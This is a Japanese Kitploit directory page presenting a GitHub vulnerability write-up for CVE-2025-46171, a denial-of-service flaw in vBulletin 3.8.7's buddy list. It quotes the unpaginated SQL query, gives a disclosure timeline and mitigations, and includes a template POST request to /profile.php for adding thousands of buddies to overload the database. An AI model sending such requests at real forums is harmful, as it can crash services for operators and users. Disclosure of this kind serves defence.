Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-46171 — vBulletin 3.8.7のフレンドリストにおけるサービス拒否(DoS)脆弱性の解説。 | Kitploit
ツール/GitHubGitHub/oiyl/cve-2025-46171
脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト設定ミスデータベースセキュリティArchived
GitHuboiyl/cve-2025-46171

CVE-2025-46171

vBulletin 3.8.7のフレンドリストにおけるサービス拒否(DoS)脆弱性の解説。

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

vBulletin 3.x.x - バディリスト過負荷によるDoS

概要

/misc.php?do=buddylist エンドポイントは、すべてのバディとそのユーザー情報およびセッション情報を取得してオンラインステータスを確認するための、単一で大規模なJOINクエリを実行します。このクエリはページネーションや結果制限なしにバディリスト全体を処理するため、バディリストが大きくなると非常にリソースを消費し、データベースに過負荷をかける可能性があります。

この問題は悪用が容易で、最小限の設定で済みます。基本ユーザーアカウント以外の特別な権限は必要ありません。バディリストを増やすだけで、データベースに深刻な負荷をかけることができます。

影響を受けるバージョン

  • ✅ 脆弱性確認済み: vBulletin 3.8.7

技術的詳細

このSQLクエリは、各バディのオンラインステータスを確認するために、バディの詳細とセッション情報を取得します。バディリスト全体を処理し、各エントリに対してセッションデータと結合するため、クエリは非常に大きく、リソースを消費します。

root@kitploit:~
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");

タイムライン

  • 2025年4月17日: 脆弱性発見
  • 2025年4月18日: MITREにCVEリクエスト提出
  • 2025年5月29日: CVE-2025-46171割り当て
  • 2025年6月27日: 公開開示

悪用方法

大量の友達追加

/profile.php に listbits をPOSTすることで、大量のフレンドリストを入力できます。これを数千のユーザーIDに対して繰り返してバディリストを増やすことができます:

root@kitploit:~
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...

影響

大規模なフォーラムでは、深刻なクエリ遅延を引き起こしたり、MySQLインスタンス全体をクラッシュさせる可能性があります。

緩和策

  • クエリのページネーションを適用するか、リクエストごとに取得するバディエントリ数を制限する
  • バディリストの変更に対するレート制限とバリデーションを適用する
ツールをダウンロード